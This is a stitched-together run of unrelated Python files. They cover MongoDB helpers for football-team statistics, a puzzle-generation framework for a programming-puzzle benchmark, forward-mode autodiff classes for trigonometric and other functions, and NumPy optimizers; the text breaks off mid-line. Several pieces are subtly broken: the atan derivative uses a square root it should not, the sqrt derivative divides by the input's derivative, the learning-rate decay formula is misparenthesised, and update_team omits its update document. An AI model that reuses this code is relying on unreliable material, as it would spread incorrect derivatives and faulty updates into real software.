#!/usr/bin/python3 from services.loggerServices.loggerService import LoggerService logger = LoggerService().logger def create_team(self, data): return self.client.FMT["teams"].insert_one(data).inserted_id def update_team(self, data): return self.client.FMT["teams"].update_one(data, upsert=True).inserted_id def update_team_with_draw(self, data, goals_scored, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_scored), 'number_of_draws': 1}, '$push': {'matches_draw': match_id}}, upsert=False) def update_winning_team(self, data, goals_scored, goals_received, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_received), 'number_of_wins': 1}, '$push': {'matches_wins': match_id}}, upsert=False) def update_losing_team(self, data, goals_scored, goals_received, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_received), 'number_of_losses': 1}, '$push': {'matches_loss': match_id}}, upsert=False) def find_team(self, data): return self.client.FMT["teams"].find_one(data) def parse_team_from_request(request): return { "name": request.get("name"), "season": request.get("season") } def init_team(request): return { "name": request.get("name"), "season": request.get("season"), "number_of_wins": request.get("number_of_wins", 0), "matches_wins": request.get("matches_wins", []), "number_of_losses": request.get("number_of_losses", 0), "matches_loss": request.get("matches_loss", []), "number_of_draws": request.get("number_of_draws", 0), "matches_draw": request.get("matches_draw", []), "number_of_scored_goals": request.get("number_of_scored_goals", 0), "number_of_received_goals": request.get("number_of_received_goals", 0) } def find_team_most_scored(teams): return max(teams, key=lambda d: d['number_of_scored_goals']) def find_team_least_scored(teams): return min(teams, key=lambda d: d['number_of_scored_goals']) def find_team_most_wins(teams): return max(teams, key=lambda d: d['number_of_wins']) def find_team_least_wins(teams): return min(teams, key=lambda d: d['number_of_wins']) def parse_team_from_db(request): return { "id": str(request.get("_id")), "name": request.get("name"), "season": request.get("season"), "number_of_wins": request.get("number_of_wins", 0), "matches_wins": request.get("matches_wins", []), "number_of_losses": request.get("number_of_losses", 0), "matches_loss": request.get("matches_loss", []), "number_of_draws": request.get("number_of_draws", 0), "matches_draw": request.get("matches_draw", []), "number_of_scored_goals": request.get("number_of_scored_goals", 0), "number_of_received_goals": request.get("number_of_received_goals", 0) } """ A ProblemSet contains one or more (related) Problems. Each Problem has one or more Instances corresponding a to a different input. A "simple" problem like (lambda x: x + "world" == "Hello world") that has no inputs has just one instance, It is important that different ProblemSets do not overlap, in terms of duplicates or answers should not be given away, like if one had a weighted shortest path problem in one problem set and an unweighted shortest path in another, they should be combined into a single ProblemSet. This us useful for tests which involve giving away some solutions but not others. """ import inspect import json from typing import List, Dict, Callable, Set, Tuple import random import os import sys import traceback import time import utils # The seed used for randomness is important because if a solver has access to this seed it can cheat and # reverse-engineer the solutions to some puzzles. Don't share the seed with AI puzzle solvers :-) _AI_SEED = 12389484322359235125123212243523534510980967133563 DEFAULT_TIMEOUT = 1.0 # seconds PATH = os.path.join(utils.my_path, "problems/") class InterpreterError(Exception): pass def my_exec(cmd, globals=None, locals=None, description='source string'): """ https://stackoverflow.com/questions/28836078/how-to-get-the-line-number-of-an-error-from-exec-or-execfile-in-python """ try: exec(cmd, globals, locals) except SyntaxError as err: error_class = err.__class__.__name__ detail = err.args[0] if err.args else "" line_number = err.lineno except Exception as err: error_class = err.__class__.__name__ detail = err.args[0] if err.args else "" cl, exc, tb = sys.exc_info() line_number = traceback.extract_tb(tb)[-1][1] else: return cmd_str = "\n".join([f"{i + 1}: {x}" for i, x in enumerate(cmd.split("\n"))]) raise InterpreterError("%s at line %d of %s: %s\n%s" % (error_class, line_number, description, detail, cmd_str)) def type_str(ty: type) -> str: """ Convert type ty to string. :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: string form of type, "str", "List[int]" , "List[List[bool]]", etc. """ type_str = str(ty).replace("typing.", "") return type_str[8:-2] if type_str.startswith(" str: """ create code to output an object of type ty as a string :param var_name: The variable name, like "x" :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: code that writes the variable to standard out as a json object """ tys = type_str(ty) if tys.startswith("Set["): return "print(json.dumps({k : 1 for k in " + var_name + "})) # write sets as dictionaries\n" return f"print(json.dumps({var_name}))\n" def gen_type_assertion(var_name: str, ty: type) -> str: """ create code to assert type of var_name is ty :param var_name: The variable name, like "x" :param ty: str, List[int] , List[List[bool]], etc. :return: code that asserts that var_name is of type ty """ tys = type_str(ty) vars = [c for c in 'abcdefghijklmnop' if c != var_name][::-1] def helper(var_name, tys): tys = tys.strip() pre_bracket = tys.split("[")[0].lower() # part before [ (or the entire string if no bracket ans = f"type({var_name}) is {pre_bracket}" if "[" in tys: inside = tys[tys.index("[") + 1:-1] new_var = vars.pop() if pre_bracket == "list" or pre_bracket == "set": inside_check = helper(new_var, inside) # if " and " in inside_check: # inside_check = "(" + inside_check + ")" ans += f" and all({inside_check} for {new_var} in {var_name})" elif pre_bracket == "dict": depth = 0 for i, c in enumerate(inside): if c == "[": depth += 1 elif c == "]": depth -= 1 elif c == "," and depth == 0: break assert depth == 0 and c == ",", "Dict[(expecting comma inside)]" key_var = vars.pop() key_check = helper(key_var, tys[:i]) val_check = helper(new_var, tys[i + 1:]) ans += f" and all({key_check} and {val_check} for {key_var}, {new_var} in {var_name}.items())" else: assert False, f"Unknown type `{tys}`" return ans return f"assert {helper(var_name, tys)}, '{var_name} must be of type {tys}'" def gen_load_code(var_name: str, ty: type) -> str: """ create code to load an object of type ty as a string :param var_name: The variable name, like "x" :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: code that reads the variable from stdin as a json object """ tys = type_str(ty) if tys.startswith("Set["): assert tys.endswith("]") inside = tys[4:-1] ans = f"{var_name} = set(json.load(sys.stdin))) # convert set (stored as json dictionary)" assertions = [f"all(isinstance(x, {inside}) for x in {var_name})"] else: ans = f"{var_name} = json.load(sys.stdin)" num_lists = tys.count("List[") assert tys.startswith("List[" * num_lists) and tys.endswith("]" * num_lists) inside = tys[5 * num_lists: len(tys) - num_lists] if num_lists == 0: assertions = [f"isinstance({var_name}, {inside})"] else: assertions = [f"isinstance({var_name}, list)"] if num_lists == 1: assertions.append(f"all(isinstance(x, {inside}) for x in {var_name})") else: assertions.append(f"all(isinstance(x, list) for x in {var_name})") if num_lists == 2: assertions.append(f"all(isinstance(y, {inside}) for x in {var_name} for y in x)") elif num_lists == 3: assertions += [f"all(isinstance(y, list) for x in {var_name} for y in x)", f"all(isinstance(z, {inside}) for x in {var_name} for y in x for z in y)"] else: assert False, f'Unknown type {tys}' assert inside in ["int", "float", "bool", "str"], f'Unknown type {tys}' return ans + "\n\n" + "\n".join(f"assert {a}, 'Type error: expecting `{tys}`'" for a in assertions) def add_preamble(src): preamble = [] types = [] if "List[" in src: types.append("List") if "Set[" in src: types.append("Set") if types: preamble.append(f"from typing import {','.join(types)}") if "json." in src: preamble.append("import json") if "sys." in src: preamble.append("import sys") return "\n".join(preamble) + "\n" * 3 + src if preamble else src def gen_prob_code(var_name: str, var_type: type, prob_src: str, inputs: str): s = f"""{prob_src} {gen_load_code(var_name, var_type)} inputs = {inputs} assert problem({var_name}, **inputs) print("Success!") """ # import inspect # print(inspect.getsource(problem)) return add_preamble(s) def gen_sol_code(var_name: str, var_type: type, sol_src: str, inputs: str): s = f"""{sol_src} inputs = {inputs} {var_name} = solution(**inputs) {gen_dump_code(var_name, var_type)} """ return add_preamble(s) class BuilderRandom(random.Random): """Adds extra random functions useful for building instances.""" def __init__(self, seed=None): self._init_seed = seed super().__init__(seed) def reseed(self): self.seed(self._init_seed) def pseudo_word(self, min_len=1, max_len=20): w = "".join(self.choice(["text", "th", "ch", "qu", *"bcdfghjklmnprstvwxz"]) + self.choice("aeiyou") for _ in range(1 + max_len // 2)) return w[:self.randrange(min_len, max_len + 1)] def heavy_tail_float(self, lower=-1000.0, upper=1000.0, median_dev=1.0): # heavy tailed distribution mean = (lower + upper) / 2.0 trunc = (upper - lower) / 2.0 while True: r = (self.random() ** (-2) - 1) / 3 if self.randrange(2): r = -r x = mean - median_dev * r if abs(x - mean) <= trunc: return x def char(self, chars="0123456789abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ!"): return self.choice(chars) class ProblemSet: def __init__(self, name, summary=None, path=PATH): self.problems = [] # Problem's self.summary = summary self.name = name self.path = PATH self._already_tested = None # self.np_random = np.random.default_rng([ord(c) for c in seed]) def add(self, problem): self.problems.append(problem) def get_filename(self): return self.path and (os.path.join(self.path, self.name.split(".")[-1]) + ".json") def get_already_tested(self): if self._already_tested is None: try: js = utils.load_json(self.get_filename()) except: js = [] self._already_tested = {j["sat"]: {sol for sol in j["sols"]} for j in js} return self._already_tested def save(self): obj = [] for p in self.problems: for i in p.instances: z = {"name": i.name, "sat": i.src, "sols": i.sol_srcs} if p.timeout is not None and p.timeout != 1: z["timeout"] = p.timeout obj.append(z) filename = self.get_filename() if not filename: json.dumps(obj) # for debugging, just to make sure that it can be converted to json utils.warning(f"No path, not saving. {[len(p.instances) for p in self.problems]}") else: try: os.makedirs(self.path, exist_ok=True) with open(filename, "w") as f: json.dump(obj, f, indent=2) solved = sum((1 if i.sol_srcs else 0) for p in self.problems for i in p.instances) dur = sum(p.build_time for p in self.problems) utils.info(f"Solved {solved:5,}/{sum([len(p.instances) for p in self.problems]):5,} instances of " f"{len(self.problems):3,} probs in {dur:.2f}s => {filename}") except FileNotFoundError: utils.error(f"***Could not save {filename}, perhaps a path problem?") return # for e in self.problems[0].instances[:10]: # utils.debug(str(e)[:100]) def get_problems(globs: dict): seen = {Problem} # don't add abstract class Problem ans = [] for v in globs.values(): try: if v in seen: continue else: seen.add(v) except TypeError: continue try: is_prob = isinstance(v, Problem) except TypeError: is_prob = False if is_prob: ans.append(v) else: try: is_prob_class = issubclass(v, Problem) except TypeError: is_prob_class = False if is_prob_class: ans.append(v()) return ans def deep_copy(obj): t = type(obj) if t in {tuple, list, set}: return t(deep_copy(x) for x in obj) if t == dict: return {k: deep_copy(v) for k, v in obj.items()} return obj def get_type(obj, ignore_errors=False): # better than type(x) because it can do things like List[int], etc. try: t = type(obj) if t in {int, float, bool, complex, range, str}: return t assert t in {tuple, list, set, dict}, f"Unacceptable input type '{t}'" iterand_types = tuple(get_type(i) for i in obj) if t == tuple: return Tuple[iterand_types] assert len(iterand_types) > 0, "Cannot get type of empty list/set/dict" assert len(set(iterand_types)) == 1, "Lists/sets/dicts must be a single type" if t == list: return List[iterand_types[0]] if t == set: return Set[iterand_types[0]] if t == dict: val_types = [get_type(i) for i in obj.values()] assert len(set(val_types)) == 1, "Dict values must be a single type" return Dict[iterand_types[0], val_types[0]] except AssertionError: if ignore_errors: return None raise def decode(st: str): # small modifications to make json roundtrip work def helper(obj): if type(obj) in [int, str, float, bool]: return obj if type(obj) == list: if len(obj) == 2 and obj[0] == "__SET__:": return set(helper(obj[1])) return [helper(i) for i in obj] if type(obj) == dict: return {json.loads(k): helper(v) for k, v in obj.items()} assert False, f"Unexpected type {type(obj)}" return helper(json.loads(st)) def encode(obj): # small modifications to make json roundtrip work def helper(x): # encodes sets in a json-friendly fashion if type(x) in [int, str, float, bool]: return x if type(x) == list: return [helper(i) for i in x] if type(x) == set: return ["__SET__:", helper({i: 0 for i in x})] if type(x) == dict: return {json.dumps(k): helper(v) for k, v in x.items()} assert False, f"Unexpected type {type(x)}" return json.dumps(helper(obj)) class Instance: def __init__(self, src, name: str, timeout=None): self.src = src self.name = name # which Problem template did it come from? self.timeout = timeout self.sol_srcs = [] def add_test(self, sol_src, run_test=True): """Assert that the solution satisfies the given instance and add the solution to the instance. Do a round-trip json encoding/decoding to mimic the actual test and deter strange attacks. Ideally this could be done by running a protected process (like in evaluating programming contest submissions) but that is much slower so we will only add that later if the AI starts misbehaving.""" if sol_src in self.sol_srcs: # already added this solution return if run_test: env = dict(List=List, Dict=Dict, Set=Set) time0 = time.perf_counter() my_exec(sol_src + "\n" + "answer = sol()", env, description=self.name) assert env["answer"] is not None, "sol returned None" answer = decode(encode(env["answer"])) assert answer == env["answer"], "encode/decode round trip failed" env2 = dict(answer=answer, List=List, Dict=Dict, Set=Set) # in case they mucked with env my_exec(self.src + "\n" + "assert sat(answer)", env2, description=self.name) dur = time.perf_counter() - time0 if dur > (DEFAULT_TIMEOUT if self.timeout is None else self.timeout * DEFAULT_TIMEOUT): utils.warn(f"Took {dur}s to test {self.name} (self.timeout={self.timeout})") self.sol_srcs.append(sol_src) def unindent(docstr): lines = [line for line in docstr.strip().split("\n")] de_indent = None for i in range(1, len(lines)): line = lines[i] if de_indent is None and line.strip(): de_indent = len(line) - len(line.lstrip(" ")) if de_indent and len(line) > de_indent: assert not line[:de_indent].strip(), f"Weird indentation in docstring:\n{docstr}" lines[i] = line[de_indent:] return "\n".join(lines) class Problem: '''Problem is an abstract class for a problem template which builds 1 or more instances. Each problem MUST OVERRIDE sat. Examples from templates/hello.py: class HelloWorld(Problem): """Trivial example, no solutions provided""" @staticmethod def sat(s: str): return s + 'world' == 'Hello world' class BackWorlds(Problem): """Two solutions, no inputs""" @staticmethod def sat(s: str): return s[::-1] + 'world' == 'Hello world' @staticmethod def sol(): return 'olleH ' @staticmethod def sol2(): # solution methods must begin with 'sol' return 'Hello '[::-1] # With other inputs, the default values of the input are used to generate the first instance. # You can run Uncat.get_example() to get the inputs, so you can then run # assert Uncat.sat(Uncat.sol(**Uncat.get_example())) class Uncat(Problem): """Simple example with inputs.""" @staticmethod def sat(st: str, a='world', b='Hello world'): return st + a == b @staticmethod def sol(a, b): return b[:len(b)-len(a)] def gen_random(self): b = self.random.pseudo_word() a = b[self.random.randrange(len(b)+1):] self.add({"a": a, "b": b}) ''' timeout = None # how long to run in seconds, default is 1.0 seconds if this is None @staticmethod def sat(ans, *other_inputs): # must override raise NotImplementedError @classmethod def get_example(cls): if not hasattr(cls, "_example"): p_spec = inspect.getfullargspec(cls.sat) if p_spec.defaults: cls._example = dict(zip(p_spec.args[-len(p_spec.defaults):], p_spec.defaults)) else: cls._example = {} cls._example_copy = deep_copy(cls._example) return cls._example @classmethod def subclass_descendents(cls): # finds all problems def descendents(cls): ans = [] for c in cls.__subclasses__(): if c is not DebugProblem: ans.append(c) ans.extend(descendents(c)) return ans ans = utils.dedup(descendents(cls)) names = set() for problem in ans: name = problem.__name__ assert name not in names, f"Duplicate problems named `{name}`" names.add(name) return ans @classmethod def debug_problems(cls, target_num_instances=None): defaults = {"target_num_instances": target_num_instances} if target_num_instances else {} debug_problems = DebugProblem.subclass_descendents() if debug_problems: for P in debug_problems: P().debug(**defaults) print(f"Problem.Debug problem(s) succeeded: {[p.__name__ for p in debug_problems]}") print("Next, remove the `Debug` from these `Problem.Debug` classes") else: all_problems = Problem.subclass_descendents() print("Suggestion for debugging: subclass Problem.Debug to test a single problem.") print(f"No Problem.Debug problems found, so testing {len(all_problems):,} problems:") for P in all_problems: P().test(**defaults) print(f"Success on all {len(all_problems):,} problem(s).") print("To make the dataset, run make_dataset.py") print("See https://github.com/microsoft/PythonProgrammingPuzzles/wiki/How-to-add-a-puzzle for more info.") def __init__(self, seed=_AI_SEED): self.name = self.__class__.__name__ assert self.sat is not Problem.sat, f"Must override {self.name}.sat" self.sat_src_spec = get_src_spec(self.sat) if not self.__doc__ or self.__doc__ == Problem.__doc__: self.desc = "" else: self.desc = unindent(self.__doc__) self.random = BuilderRandom(f"{seed} | {self.name}") self.instances = [] self._seen_problems = set() self._built_target = 0 self.build_time = None self._already_tested = None sol_names = [k for k in dir(self) if k.startswith("sol")] self.sols = [getattr(self, k) for k in sol_names] self.sol_src_specs = [get_src_spec(s) for s in self.sols] mro_dict = {} for mro in inspect.getmro(self.__class__)[::-1]: mro_dict.update(mro.__dict__) assert all(isinstance(mro_dict[k], staticmethod) for k in ["sat"] + sol_names), \ f"{self.name} `sat` and `sol` must be defined with @staticmethod" p_spec = self.sat_src_spec[1] self.arg_names = p_spec.args assert len(self.arg_names) > 0, f"{self.name}.problem() takes no arguments!" self.types = p_spec.annotations if self.sols: s_spec = self.sol_src_specs[0][1] assert self.arg_names[1:] == s_spec.args, \ f"mismatched problem/solution arguments for {self.name}" self.types.update(s_spec.annotations) assert set(self.arg_names[1:]) == set(self.get_example()), f"Bad {self.name} example" self.types.update({v: get_type(x) for v, x in self.get_example().items() if get_type(x, True)}) for v in self.arg_names: assert v in self.types, f"Cannot determine type of `{v}` in {self.name} -- no annotation/_example" def build(self, target_num_instances, already_tested={}, max_random_attempts=100, force_trivial_test=False): if self._built_target == target_num_instances: return self.check_for_trivial_solutions(force_trivial_test, already_tested) self._already_tested = already_tested self._seen_problems = set() self._built_target = target_num_instances self.random.reseed() self._tested = 0 self.instances = [] start_time = time.perf_counter() self.add(self.get_example()) if target_num_instances > 1: self.gen(target_num_instances) while len(self.instances) < target_num_instances: n = len(self.instances) for _ in range(max_random_attempts): self.gen_random() if n != len(self.instances): # added a problem break if len(self.instances) == n: # failed max_random_attempts, give up break if not self.instances: utils.error(f"{self.name} did not generate any problem instances") self.build_time = time.perf_counter() - start_time self._already_tested = None assert self._example_copy == self._example, f"Puzzle {self.name} changed inputs" if self._tested: utils.info(f"Tested {self._tested} instances of {self.name}") def check_for_trivial_solutions(self, force, already_tested): # check for trivial solutions example = self.get_example() src = inject_into_src(*self.sat_src_spec, "sat", example, self.types, add_type_assertion=True) if (not force and src in already_tested) or not hasattr(self, "sol"): return utils.info(f"Checking for trivial solutions to {self.name}") time0 = time.perf_counter() ans = self.sol(**example) if type(ans) == int: if ans in range(-1000, 1000): tests = [ans] else: tests = [] elif type(ans) == str: if len(ans) <= 1: tests = [ans] else: tests = ["cat", "dog", "aa", "ab", "foo", "bar", "baz"] elif type(ans) == float: tests = [-100.0, -10.0, -2.0, -1.0, -0.5, -0.1, 0.0, 0.1, 0.5, 1.0, 2.0, 10.0, 100.0] elif type(ans) == bool: tests = [True, False] elif type(ans) == list or type(ans) == set: if len(ans) == 0: tests = [ans] else: el = list(ans)[0] if type(el) == int: base = list(range(-3, 4)) elif type(el) == str: base = ["a", "b", "foo", "bar", "baz"] elif type(el) == bool: base = [True, False] elif type(el) == float: base = [-1.0, -0.1, 0.0, 0.1, 0.5, 1.0, 2.0] else: # print(f"Can't create trivial instances fitting pattern `{ans}`"[:1000]) base = [] from itertools import product tests = [] for r in range(6): tests.extend(type(ans)(p) for p in product(base, repeat=r)) else: print(f"Can't check for types, unexpected type `{type(ans)}`") tests = [] for t in tests: try: assert self.sat(t, **example) except: continue utils.warn(f"`{self.name}` in file `{self.__module__.split('.')[-1]}` " f"has trivial solution `{t}`") break dur = time.perf_counter() - time0 if dur > (self.timeout or 1.0): utils.warn(f"Took {dur:.1f}s to test for trivial solutions to `{self.name}`") def gen(self, target_num_instances): pass def gen_random(self): pass def check_seen_input(self, inp): """ Returns True if the input is a duplicate of a previous puzzle, and also makes sure that the types match """ s = str(inp) if s in self._seen_problems: return True # duplicate problem self._seen_problems.add(s) assert set(inp) == set(self.arg_names[1:]), \ f"Instance #{len(self.instances)} keys mismatch in {self.name}" for v in inp: assert get_type(inp[v], ignore_errors=True) in (None, self.types[v]), \ f"Instance #{len(self.instances)} variable `{v}` type mismatch in {self.name}" return False def add(self, inp: dict, test=True): if self.check_seen_input(inp): return # don't add duplicate problems instance = Instance( inject_into_src(*self.sat_src_spec, "sat", inp, self.types, add_type_assertion=True), f"{self.name}_{len(self.instances)}", timeout=self.timeout ) if test: for s, (sol_src, sol_spec) in zip(self.sols, self.sol_src_specs): sol_src = inject_into_src(sol_src, sol_spec, "sol", inp) if instance.src in self._already_tested and sol_src in self._already_tested[instance.src]: instance.add_test(sol_src, run_test=False) else: try: instance.add_test(sol_src, run_test=True) self._tested += 1 except Exception: # failed to pass test, rerun test without for debugging with normal exception assert self.sat(s(**inp), **inp) is True, f"Puzzle {self.name} didn't return True on `{inp}`" utils.error("Strange, failed test in exec but passed without exec") raise self.instances.append(instance) def test(self, target_num_instances=100): self.build(target_num_instances, force_trivial_test=True) class DebugProblem(Problem): """ A useful class for creating a debugging problems. Any DebugProblem will be run before any other problems. The program will exit if it successful. """ # def __init__(self): # print("ho") # super().__init__() def add(self, inp: dict, test=True): if self.check_seen_input(inp): return # don't add duplicate problems if test: var_name = self.sat_src_spec[1].args[0] type_assertion_str = gen_type_assertion(var_name, self.types[var_name]) for s in self.sols: answer = s(**inp) exec(type_assertion_str, {var_name: answer}) assert self.sat(answer, **inp) is True, f"Puzzle {self.name} didn't return True on `{inp}`" self.instances.append(("DEBUG TEST", bool(test and self.sols))) # for counting purposes def debug(self, target_num_instances=10000): print(f"Debugging {self.name}") self.build(target_num_instances, force_trivial_test=True) solved = sum(i[1] for i in self.instances) dur = self.build_time utils.info(f"Tested {solved:,}/{len(self.instances):,} instances of " f"({self.name}: DebugProblem) in {dur:0.2f}s") Problem.Debug = DebugProblem def remove_type_assertion(src: str): lines = src.split("\n") assert lines[1].strip().startswith("assert type") lines.pop(1) return "\n".join(lines) def get_src_spec(f: Callable): try: src = inspect.getsource(f) spec = inspect.getfullargspec(f) except OSError: utils.error("Cannot use inspect, happens in some interpreters... Try running in ipython.") raise de_indent = min([len(line) - len(line.lstrip(" ")) for line in src.splitlines() if line.strip()]) src = "\n".join([line[de_indent:] for line in src.splitlines()]).strip() if src.startswith("@staticmethod"): src = src[len("@staticmethod"):].strip() assert src.startswith("def ") return src, spec def inject_into_src(src, spec, new_function_name=None, defaults={}, types={}, add_type_assertion=False): if spec.defaults: # combine defaults, with defaults over-riding spec.defaults defaults = {**dict(zip(spec.args[-len(spec.defaults):], spec.defaults)), **defaults} assert all(var in spec.args for var in defaults), f"Defaults {defaults} not all in spec.args" for v, t in spec.annotations.items(): assert v not in types or types[v] == t, f"Annotation mismatch in {src}" types = {**spec.annotations, **types} func_name = (new_function_name or src[4:src.index('(')]) arg_st = ", ".join([var + (f": {type_str(types[var])}" if var in types else "") + (f"={utils.stringify(defaults[var])}" if var in defaults else "") for var in spec.args]) ans = f'def {func_name}({arg_st}):' if add_type_assertion: assert func_name == "sat" indent = min([len(line) - len(line.lstrip(" ")) for line in src.splitlines() if line.strip() and line.startswith(" ")]) ans += "\n" + " " * indent + gen_type_assertion(spec.args[0], types[spec.args[0]]) ans += src[src.index("):") + 2:] return ans def get_func_name(src): assert src.startswith("def ") return src[4:src.index("(")] def save_readme(problem_sets, filename=os.path.join(PATH, "README.md")): top = """# Python Programming Puzzles: dataset summary This document summarizes the dataset stored in .json files. Each .json file contains a number of related problems with one or more puzzles each. (Each puzzle in the json files contains an assert statement on its first line ensuring that the input is of the correct type---these assertions have been removed below for readability.) The only import required for puzzles is: ```from typing import List, Set, Dict``` ## Files: {} ---- """ table = "" content = "" tot_probs = 0 tot_instances = 0 for ps in problem_sets: section = "" sec_name = ps.name.split(".")[-1] section += f"## {sec_name}\n\n" section += f"{ps.summary}\n\n" n = len(ps.problems) link = f"[{sec_name}](#{sec_name.lower().replace(' ', '-')})" section += "[^ Top](#files)\n\n" n_instances = sum(len(p.instances) for p in ps.problems) tot_probs += len(ps.problems) tot_instances += n_instances table += f"- [{sec_name} ({len(ps.problems):,} problems, {n_instances:,} instances)](#{sec_name.lower().replace(' ', '-')})\n" for i, problem in enumerate(ps.problems): section += f"### {problem.name}\n({link} {i + 1:,}/{n:,})\n\n" section += f"**Description:**\n{problem.desc}\n\n" section += f"**Problem:**\n\n```python\n{remove_type_assertion(problem.instances[0].src)}\n```\n" if len(problem.instances[0].sol_srcs) > 0: section += "
Reveal solution(s):\n\n" for sol in problem.instances[0].sol_srcs: section += f"```python\n{sol}\n```\n\n" section += "
\n\n" # section += f"[^ Back](#{sec_name.lower().replace(' ', '-')})\n\n" # Replaced with link in the header section += "[^^ Top](#files)\n" content += section table += f"\nTotal ({tot_probs:,} problems, {tot_instances:,} instances)\n" content = top.format(table) + content with open(filename, "w", encoding='utf8') as f: f.write(content) 0 import tensorflow as tf @tf.function(experimental_relax_shapes=True) def error(true, pred): return tf.math.abs(tf.math.subtract(true, pred)) extract_distinct_frames/__init__.py #!/usr/bin/env python # -*- coding: utf-8 -*- """ This script allows the extraction of the distinct frames in a video file or a youtube video. """ __version__ = "1.1" name = "extract_distinct_frames" from genericdiff.generic_diff import * import math class sin(GenericDiff): def __init__(self, obj): def _sin_generic(obj): self.val = math.sin(obj.val) self.der = math.cos(obj.val)*obj.der try: _sin_generic(obj) except AttributeError: obj = Constant(obj) _sin_generic(obj) class cos(GenericDiff): def __init__(self, obj): def _cos_generic(obj): self.val = math.cos(obj.val) self.der = -math.sin(obj.val)*obj.der try: _cos_generic(obj) except AttributeError: obj = Constant(obj) _cos_generic(obj) class tan(GenericDiff): def __init__(self, obj): def _tan_generic(obj): self.val = math.tan(obj.val) self.der = obj.der/(math.cos(obj.val)**2.0) try: _tan_generic(obj) except AttributeError: obj = Constant(obj) _tan_generic(obj) class sinh(GenericDiff): def __init__(self, obj): def _sinh_generic(obj): self.val = math.sinh(obj.val) self.der = math.cosh(obj.val) * obj.der try: _sinh_generic(obj) except AttributeError: obj = Constant(obj) _sinh_generic(obj) class cosh(GenericDiff): def __init__(self, obj): def _cosh_generic(obj): self.val = math.cosh(obj.val) self.der = math.sinh(obj.val) * obj.der try: _cosh_generic(obj) except AttributeError: obj = Constant(obj) _cosh_generic(obj) class tanh(GenericDiff): def __init__(self, obj): def _tanh_generic(obj): self.val = math.tanh(obj.val) self.der = obj.der/(math.cosh(obj.val)**2.0) try: _tanh_generic(obj) except AttributeError: obj = Constant(obj) _tanh_generic(obj) class acos(GenericDiff): def __init__(self, obj): def _acos_generic(obj): self.val = math.acos(obj.val) self.der = -obj.der/(math.sqrt(1.0 - obj.val**2.0)) try: _acos_generic(obj) except AttributeError: obj = Constant(obj) _acos_generic(obj) class asin(GenericDiff): def __init__(self, obj): def _asin_generic(obj): self.val = math.asin(obj.val) self.der = obj.der/(math.sqrt(1.0 - obj.val**2.0)) try: _asin_generic(obj) except AttributeError: obj = Constant(obj) _asin_generic(obj) class atan(GenericDiff): def __init__(self, obj): def _atan_generic(obj): self.val = math.atan(obj.val) self.der = obj.der / (math.sqrt(1.0 + obj.val ** 2.0)) try: _atan_generic(obj) except AttributeError: obj = Constant(obj) _atan_generic(obj) #exponential for base e class exp(GenericDiff): def __init__(self, obj): def _exp_generic(obj): self.val = math.exp(obj.val) if obj.der == 0: self.der = 0 else: self.der = math.exp(obj.val)*obj.der try: _exp_generic(obj) except AttributeError: obj = Constant(obj) _exp_generic(obj) # will handle any base with default = e class log(GenericDiff): def __init__(self, obj, base=math.e): def _log_generic(obj): self.val = math.log(obj.val, base) if obj.der == 0: self.der = 0 else: self.der = obj.der/(obj.val*math.log(base)) try: _log_generic(obj) except AttributeError: obj = Constant(obj) _log_generic(obj) #logistic function class logit(GenericDiff): def __init__(self, obj): def _logit_generic(obj): self.val = math.exp(obj.val)/(1+math.exp(obj.val)) self.der = (1+math.exp(-obj.val))**(-2)*(math.exp(-obj.val))*(-obj.der) try: _logit_generic(obj) except AttributeError: obj = Constant(obj) _logit_generic(obj) #sqrt function class sqrt(GenericDiff): def __init__(self, obj, base=math.e): def _sqrt_generic(obj): if obj.val <= 0: raise ValueError("Cannot take the derivative for sqrt of 0 or negative number.\n\ This package only outputs real numbers.") self.val = math.sqrt(obj.val) if obj.der == 0: self.der = 0 else: self.der = 1/(2*math.sqrt(obj.val)*obj.der) try: _sqrt_generic(obj) except AttributeError: obj = Constant(obj) _sqrt_generic(obj) huangyuyao/bevutils from ..registry import LOSSES import torch.nn.functional as F @LOSSES.register def nll_loss(output, target): return F.nll_loss(output, target)import copy import numpy as np from .initializations import _zero class Optimizer(object): def __init__(self, lr=0.001, clip=-1, decay=0., lr_min=0., lr_max=np.inf): self.lr = lr self.clip = clip self.decay = decay self.lr_min = lr_min self.lr_max = lr_max self.iterations = 0 def update(self, params, grads): self.iterations += 1 self.lr *= (1. / 1 + self.decay * self.iterations) self.lr = np.clip(self.lr, self.lr_min, self.lr_max) def __str__(self): return self.__class__.__name__ class SGD(Optimizer): def __init__(self, *args, **kwargs): super(SGD, self).__init__(*args, **kwargs) def update(self, params, grads): for p, g in zip(params, grads): p -= self.lr * npdl_clip(g, self.clip) super(SGD, self).update(params, grads) class Momentum(Optimizer): def __init__(self, momentum=0.9, *args, **kwargs): super(Momentum, self).__init__(*args, **kwargs) self.momentum = momentum self.velocity = None def update(self, params, grads): # init the velocities if self.velocity is None: self.velocity = [_zero(p.shape) for p in params] # update the parameters for i, (v, p, g) in enumerate(zip(self.velocity, params, grads)): v = self.momentum * v - self.lr * g p += v self.velocity[i] = v super(Momentum, self).update(params, grads) class NesterovMomentum(Optimizer): def __init__(self, momentum=0.9, *args, **kwargs): super(NesterovMomentum, self).__init__(*args, **kwargs) self.momentum = momentum self.velocity = None def update(self, params, grads): # init the velocities if self.velocity is None: self.velocity = [_zero(p.shape) for p in params] # update the parameters for i, (v, p, g) in enumerate(zip(self.velocity, params, grads)): v = self.momentum * v - self.lr * g p += (self.momentum * v - self.lr * g) self.velocity[i] = v super(NesterovMomentum, self).update(params, grads) class Adagrad(Optimizer): def __init__(self, epsilon=1e-6, *args, **kwargs): super(Adagrad, self).__init__(*args, **kwargs) self.epsilon = epsilon self.cache = None def update(self, params, grads): # init cache if self.cache is None: self.cache = [_zero(g.shape) for g in grads] # update parameters for i, (c, p, g) in enumerate(zip(self.cache, params, grads)): c += np.power(g, 2) p -= self.lr * g / (np.sqrt(c) + self.epsilon) self.cache[i] = c super(Adagrad, self).update(params, grads) class RMSprop(Optimizer): def __init__(self, rho=0.9, epsilon=1e-6, *args, **kwargs): super(RMSprop, self).__init__(*args, **kwargs) self.rho = rho self.epsilon 